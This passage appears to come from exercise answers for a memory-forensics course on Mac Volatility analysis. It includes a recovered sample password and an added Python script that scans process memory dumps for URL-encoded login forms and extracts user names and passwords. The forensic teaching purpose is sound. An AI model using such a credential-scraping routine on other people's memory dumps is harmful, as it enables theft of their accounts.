The password was breakmedown456. The POST body sits in the process heap in clear text even though it was sent over HTTPS, because TLS only encrypts the buffer once it is handed to the transport layer.
6. To answer the following questions analyze mac-sample-4.bin using the provided 10.9.3 profile.
A) Which messages were being written in the Notes application?
B) Create a plugin that can automatically find messages within the address space of the TextEdit application. Use this plugin to recover the messages being typed by the user.
Answer: The messages being written into the Notes application can be recovered using the mac_notesapp plugin.
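The answer to question 5 of Chapter 31 recovers the Gmail password by searching the Mail process with mac_yarascan for the literal "&Pass". The script below is an added example, not code from the book or from Volatility, that generalizes that search to a raw dump of a process address space (for instance the file written by mac_memdump): it finds every application/x-www-form-urlencoded body in the dump, URL-decodes the fields, and reports the bodies that carry a password-like parameter. The sample dump is constructed here to mimic the layout in the output above; only the Passwd and service field names come from the page, while the Email field, the request line and the second, hypothetical login form are assumed.

```python
#!/usr/bin/env python3
"""Pull credential-bearing form bodies out of a raw process memory dump."""
import re
import sys
from urllib.parse import parse_qsl

# Characters legal in a percent-encoded key or value; '=' and '&' are
# deliberately excluded so the pattern cannot straddle two fields.
_TOKEN = rb"[A-Za-z0-9_.~%+*@!$'()-]"
# One or more key=value pairs joined by '&', as a browser or mail client
# serializes a login form.
FORM_BODY_RE = re.compile(
    rb"(?:" + _TOKEN + rb"+=" + _TOKEN + rb"*)"
    rb"(?:&" + _TOKEN + rb"+=" + _TOKEN + rb"*)*"
)
# Parameter names that usually hold a secret (compared case-insensitively).
SECRET_KEYS = {"passwd", "password", "pass", "pwd"}


def scan_buffer(data, min_fields=2):
    """Return a list of {offset, fields, secret_key} for every credential-bearing form body.

    Bodies with fewer than min_fields parameters are ignored to cut noise
    from stray 'a=b' fragments.
    """
    hits = []
    for match in FORM_BODY_RE.finditer(data):
        body = match.group(0).decode("latin-1")
        fields = dict(parse_qsl(body, keep_blank_values=True))
        if len(fields) < min_fields:
            continue
        secret = next((k for k in fields if k.lower() in SECRET_KEYS), None)
        if secret is None:
            continue
        hits.append({"offset": match.start(), "fields": fields, "secret_key": secret})
    return hits


def scan_file(path):
    """Scan a dump file produced by e.g. mac_memdump -p <pid> -D <dir>."""
    with open(path, "rb") as fh:
        return scan_buffer(fh.read())


# Constructed sample dump: a Gmail-style login POST surrounded by heap noise,
# a harmless preferences form, and a second hypothetical login form whose
# value needs URL-decoding.
CONSTRUCTED_DUMP = (
    b"\x00\x00heap garbage\x00"
    b"POST /ServiceLoginAuth HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"Email=iaminakeychain%40gmail.com&Passwd=breakmedown456&service=mail&rmShown=1"
    b"\x00\x00\x00" + b"\xff" * 8 +
    b"theme=dark&lang=en\x00"
    b"user=alice&password=s3cret%21&submit=Login\x00"
)


def demo():
    """Scan the constructed dump; returns the hits so callers can inspect them."""
    hits = scan_buffer(CONSTRUCTED_DUMP)
    for hit in hits:
        print("offset 0x%x: %s=%r  (fields: %s)" % (
            hit["offset"], hit["secret_key"], hit["fields"][hit["secret_key"]],
            ", ".join(sorted(hit["fields"]))))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for hit in scan_file(sys.argv[1]):
            print("offset 0x%x: %s=%r" % (
                hit["offset"], hit["secret_key"], hit["fields"][hit["secret_key"]]))
    else:
        demo()
```

Where mac_yarascan's -Y "&Pass" only finds the one string you already know to look for, the regular expression recovers the whole form body, so the matching user name (Email here) and service come out with the password. The same scan applies unchanged to Linux and Windows process dumps, since the encoding is the client's, not the operating system's.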